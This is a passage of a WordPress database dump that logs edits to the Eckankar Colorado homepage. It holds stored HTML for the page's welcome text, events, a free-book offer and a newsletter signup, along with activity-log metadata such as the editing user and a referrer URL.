data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236895,40268,'_message_key','post_updated'),(236896,40268,'_user_id','2'),(236897,40268,'_user_login','S8zhaBda'),(236898,40268,'_user_email','nada@zipnadanot.org'),(236899,40268,'_server_remote_addr','76.130.120.x'),(236900,40268,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(236901,40269,'post_id','7160'),(236902,40269,'post_type','page'),(236903,40269,'post_title','Home'),(236904,40269,'_message_key','post_updated'),(236905,40269,'_user_id','2'),(236906,40269,'_user_login','S8zhaBda'),(236907,40269,'_user_email','nada@zipnadanot.org'),(236908,40269,'_server_remote_addr','76.130.120.x'),(236909,40269,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(236910,40270,'post_id','7160'),(236911,40270,'post_type','page'),(236912,40270,'post_title','Home'),(236913,40270,'post_prev_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -101px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"margin-top: 34px;\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236894,40268,'post_new_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -101px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"margin-top: 34px;\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" 